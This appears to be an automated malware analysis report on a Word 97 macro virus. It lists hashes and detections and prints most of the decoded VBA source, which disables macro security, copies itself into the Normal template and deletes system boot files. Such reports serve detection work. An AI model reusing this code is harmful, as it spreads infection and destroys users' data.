Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 31668148a5864393…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 36.5 KB
Created: 1999-04-15 16:19:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: a9f2a1bcaf86e04efdfb347c5cc6ec69
SHA-1: 2a1c74af89c4f4a1d550c91cba737cd68bb5bbe2
SHA-256: 31668148a58643933b5c2b9a1daafd95628ac8c46807934b5a6ad71685e6d41e
Risk score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open auto-execution macro, a common initial-execution technique in malicious Office documents. The macro attempts to disable Word's macro security settings and exports itself to 'C:\Mail.sys', suggesting it is part of a downloader or dropper mechanism. The ClamAV detections 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Zmk-9' further indicate malicious intent.

Heuristics (3)

  • ClamAV: Win.Trojan.Psycho-3 | severity: critical | CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected | severity: medium | 1 related finding | OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro | severity: high | OLE_VBA_DOCOPEN
    Document contains a Document_Open auto-execution macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 17083 bytes
SHA-256: 695f6152b6417fb7bcb6a8e1ca349cb2c0314778c9953d9fbd30fa3c99e0202f
Detection: ClamAV: Doc.Trojan.Zmk-9
Obfuscation or payload: unlikely

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ZmkMail"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error GoTo ErrorDocOpen
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.VirusProtection = False
Options.SaveNormalPrompt = False
End If
Dim MyTime, COL, COLTemp, NumRnd
MyTime = Time
NumRnd = Int(Rnd * 13) + 1
THeur$ = Mid(MyTime, 1, 2)
TMin$ = Mid(MyTime, 4, 5)
TSec$ = Mid(MyTime, 7, 8)
iMacroNormalTempCount = NormalTemplate.VBProject.VBComponents.Count
For i = 1 To iMacroNormalTempCount
    If NormalTemplate.VBProject.VBComponents(i).Name = "ZmkMail" Then
        ZmkMailNormInstalled = -1
    End If
Next i
If Not ZmkMailNormInstalled Then
    ActiveDocument.VBProject.VBComponents("ZmkMail").Export "C:\Mail.sys"
    NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\mail.sys"
    NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.DeleteLines 1, 4
    COLTemp = NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.CountOfLines
    NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 1, "Sub FileTemplates()"
    NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 2, "    Application.EnableCancelKey = wdCancelDisabled"
    NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 3, "End Sub"
    NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 4, "Sub ToolsMacro()"
    NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 5, "    Application.EnableCancelKey = wdCancelDisabled"
    NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 6, "End Sub"
    NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 7, "Sub ViewVBCode()"
    NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 8, "    Application.EnableCancelKey = wdCancelDisabled"
    NormalTemplate.VBProject.VBComponents("ZmkMail").CodeModule.InsertLines COLTemp + 9, "End Sub"
Else
    iMacroDocuCount = ActiveDocument.VBProject.VBComponents.Count
    For i = 1 To iMacroDocuCount
        If ActiveDocument.VBProject.VBComponents(i).Name = "ZmkMail" Then
            ZmkMailDocInstalled = -1
        End If
    Next i
If Not ZmkMailDocInstalled Then
    NormalTemplate.VBProject.VBComponents("ZmkMail").Export "C:\Mail.sys"
    ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "C:\Mail.sys"
    ActiveDocument.VBProject.VBComponents("ZmkMail").CodeModule.DeleteLines 1, 4
    COL = ActiveDocument.VBProject.VBComponents("ZmkMail").CodeModule.CountOfLines
    ActiveDocument.VBProject.VBComponents("ZmkMail").CodeModule.DeleteLines COL - 8, 9
    ActiveDocument.Save
End If
If (THeur$ = "12") Or (TMin$ = "12") Or (TSec$ = "12") Then
    Call PayMail
Else
    Selection.EndKey Unit:=wdStory
    Selection.TypeParagraph
    Selection.TypeText "1*1=1 2*2=4 3*3=9"
    If (NumRnd = 13) And (TMin$ = "13") Then
        MsgBox "Clear Files", , "Microsoft Word"
        Kill "C:\Autoexec.bat"
        Kill "C:\Config.sys"
        Kill "C:\msdos.sys"
        Kill "c:\io.sys"
    End If
End If
End If
ErrorDocOpen:
End Sub
Private Sub PayMail()
On Error GoTo ErrorPayMail
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\
... (truncated)